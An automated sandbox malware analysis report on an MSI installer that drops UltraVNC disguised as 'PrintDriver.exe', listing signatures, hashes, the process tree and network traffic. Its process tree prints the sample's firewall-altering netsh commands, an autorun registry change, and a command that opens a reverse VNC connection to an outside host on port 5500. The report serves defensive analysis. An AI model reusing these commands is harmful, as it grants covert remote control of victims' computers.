
Windows Analysis Report
rs8dpaIe6D.msi

Overview

General Information

Sample name: rs8dpaIe6D.msi (renamed because original name is a hash value)
Original sample name: e21b2080c98beb0f04307a5a25630e23.msi
Analysis ID: 1531399
MD5: e21b2080c98beb0f04307a5a25630e23
SHA1: 8fc24ad51e8d61324fe8de1be667862e9238cbbb
SHA256: 0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e
Tags: msi, UltraVNC, user-abuse_ch

Detection

UltraVNC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Creates an undocumented autostart registry key
Drops executables to the windows directory (C:\Windows) and starts them
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • msiexec.exe (PID: 7544 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\rs8dpaIe6D.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7608 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7708 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 09F4460A034BA1C42EB6AA8B09573B17 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI4384.tmp (PID: 7792 cmdline: "C:\Windows\Installer\MSI4384.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd" MD5: 432827EC55428786A447B3D848D963B7)
  • PrintDrivers.exe (PID: 7824 cmdline: "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd" MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
    • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mode.com (PID: 7916 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)
      • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • reg.exe (PID: 7968 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • WMIC.exe (PID: 7988 cmdline: wmic process where (name="PrintDriver.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • findstr.exe (PID: 7996 cmdline: findstr /i "PrintDriver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7700 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7760 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • mode.com (PID: 7704 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)
        • netsh.exe (PID: 7560 cmdline: netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • netsh.exe (PID: 7708 cmdline: netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • WMIC.exe (PID: 7580 cmdline: wmic process where (name="PrintDriver.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • findstr.exe (PID: 7804 cmdline: findstr /i "PrintDriver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • PrintDriver.exe (PID: 7304 cmdline: C:\Games\PrintDriver.exe -autoreconnect ID:5271523 -connect besthard2024.zapto.org:5500 -run MD5: 27C1C264C6FCE4A5F44419F1783DB8E0)
      • timeout.exe (PID: 2828 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 4856 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8000 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 8012 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8144 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 2080 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • PrintDrivers.exe (PID: 7732 cmdline: C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
        • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • mode.com (PID: 5344 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)
          • cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 8180 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • reg.exe (PID: 7324 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • timeout.exe (PID: 1148 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 8012 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 7768 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 3584 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 7184 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 1028 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Games\PrintDriver.exe | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |

Source | Rule | Description | Author | Strings
0000001A.00000000.1861273877.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
0000001A.00000000.1861087410.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
0000001A.00000002.2961946553.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
Process Memory Space: PrintDriver.exe PID: 7304 | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |

Source | Rule | Description | Author | Strings
26.2.PrintDriver.exe.7ff67da80000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
26.0.PrintDriver.exe.7ff67da80000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Games\PrintDriver.cmd, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Load

No Suricata rule has matched

AV Detection

Source: besthard2024.zapto.org | Virustotal: Detection: 8%
Source: C:\Games\PrintDriver.exe | Virustotal: Detection: 8%
Source: rs8dpaIe6D.msi | Virustotal: Detection: 14%
Source: rs8dpaIe6D.msi | ReversingLabs: Detection: 26%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.6% probability
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\winvnc\x64\Release\winvnc.pdbGCTL source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\x64\Release\vnchooks.pdb source: vnchooks.dll.1.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\x64\Release\UVncVirtualDisplay.pdb source: UVncVirtualDisplay.dll.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: MSI4384.tmp, 00000003.00000000.1741334832.000000000046F000.00000002.00000001.01000000.00000003.sdmp, MSI4384.tmp, 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp, rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine\x64\Release\ddengine.pdb source: ddengine.dll.1.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\winvnc\x64\Release\winvnc.pdb source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: powercfg.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: PrintDrivers.exe, 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000004.00000000.1742802683.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000000.1887440811.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000002.2957683401.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe.1.dr, powercfg.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: powercfg.msi.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: rs8dpaIe6D.msi, MSI4075.tmp.1.dr, MSI3ECB.tmp.1.dr, 603b50.msi.1.dr, MSI3F98.tmp.1.dr, MSI3F39.tmp.1.dr, MSI3FE7.tmp.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSI4384.tmp, 00000003.00000000.1741334832.000000000046F000.00000002.00000001.01000000.00000003.sdmp, MSI4384.tmp, 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp, rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: PrintDrivers.exe, 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000004.00000000.1742802683.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000000.1887440811.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000002.2957683401.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe.1.dr, powercfg.msi.1.dr
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_00461914 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: global traffic | TCP traffic: 192.168.2.4:49743 -> 94.156.104.60:5500
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: besthard2024.zapto.org
Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC0C000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC0C000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://ocsp.digicert.com0I
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://ocsp.digicert.com0R
Source: rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: http://s.symcd.com06
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: http://t2.symcb.com0
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: http://tl.symcd.com0&
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: https://d.symcb.com/cps0%
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: https://d.symcb.com/rpa0
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: https://d.symcb.com/rpa0.
Source: PrintDriver.exe.1.dr | String found in binary or memory: https://forum.uvnc.com
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | String found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
Source: ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | String found in binary or memory: https://sectigo.com/CPS0
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: https://www.advancedinstaller.com
Source: UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: https://www.thawte.com/cps0/
Source: PrintDrivers.exe.1.dr, powercfg.msi.1.dr | String found in binary or memory: https://www.thawte.com/repository0W
Source: PrintDriver.exe.1.dr | String found in binary or memory: https://www.uvnc.com
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | String found in binary or memory: https://www.uvnc.comcmd
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | String found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\603b50.msiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3ECB.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F39.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F98.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FE7.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4075.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{47512254-C195-428F-AD42-A0F24652B3FD}Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4112.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4384.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI3ECB.tmpJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_004601503_2_00460150
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_004571A93_2_004571A9
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_004583933_2_00458393
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0042D4003_2_0042D400
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0044B5703_2_0044B570
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0045168D3_2_0045168D
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_004537DC3_2_004537DC
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0045F7A43_2_0045F7A4
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00465A593_2_00465A59
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00451ACC3_2_00451ACC
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00453B753_2_00453B75
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00455B103_2_00455B10
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00449CEC3_2_00449CEC
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0045FDF03_2_0045FDF0
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005867A04_2_005867A0
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005B00404_2_005B0040
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005AE0E04_2_005AE0E0
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005B91514_2_005B9151
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005AB1CB4_2_005AB1CB
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_0058C3404_2_0058C340
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005AB3FD4_2_005AB3FD
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A67B04_2_005A67B0
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005C18044_2_005C1804
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005B18B44_2_005B18B4
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005C19244_2_005C1924
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_0058DD004_2_0058DD00
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005BFDE44_2_005BFDE4
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005C4EF04_2_005C4EF0
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005B9F094_2_005B9F09
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_0058FF004_2_0058FF00
                  Source: Joe Sandbox ViewDropped File: C:\Games\PrintDriver.exe 29379AFD1CA5439C82931D623FDA335174DC416E5B013591457FA1F7BBE564DB
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: String function: 0044A03C appears 103 times
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: String function: 0044A06F appears 67 times
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: String function: 0044A400 appears 40 times
                  Source: C:\Games\PrintDrivers.exeCode function: String function: 005A5126 appears 56 times
                  Source: C:\Games\PrintDrivers.exeCode function: String function: 005A50F2 appears 94 times
                  Source: C:\Games\PrintDrivers.exeCode function: String function: 005A5630 appears 40 times
                  Source: PrintDriver.exe.1.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
